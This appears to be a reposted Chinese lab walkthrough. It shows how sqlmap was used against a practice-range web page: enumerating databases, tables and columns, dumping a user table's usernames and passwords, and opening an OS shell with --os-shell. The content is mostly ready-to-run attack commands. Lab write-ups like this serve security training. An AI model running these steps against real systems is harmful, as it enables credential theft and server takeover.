WriteUp:Kali渗透 - 通过Sqlmap直接获得服务器权限
Posted Zeker62
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了WriteUp:Kali渗透 - 通过Sqlmap直接获得服务器权限相关的知识,希望对你有一定的参考价值。
靶场链接:https://hack.zkaq.cn/battle/target?id=aabe6f2bda75107c
使用sqlmap进行渗透测试
-
找到可能存在注入点的网站,http://59.63.200.79:6453/single.php?id=1放到sqlmap上跑:
sqlmap -u "http://59.63.200.79:6453/single.php?id=1"
发现三个SQL漏洞:
-
爆库:
sqlmap -u "http://59.63.200.79:6453/single.php?id=1" --dbs
-
爆表:
sqlmap -u "http://59.63.200.79:6453/single.php?id=1" -D cake --tables --batch
-
爆字段:
sqlmap -u "http://59.63.200.79:6453/single.php?id=1" -D cake -T user --columns --batch
-
爆值:
sqlmap -u "http://59.63.200.79:6453/single.php?id=1" -D cake -T user -C username --dump --batch
sqlmap -u "http://59.63.200.79:6453/single.php?id=1" -D cake -T user -C passwd --dump --batch
-
获取服务器权限:
sqlmap -u "http://59.63.200.79:6453/single.php?id=1" --os-shell
是PHP,输入4 -
为所欲为
以上是关于WriteUp:Kali渗透 - 通过Sqlmap直接获得服务器权限的主要内容,如果未能解决你的问题,请参考以下文章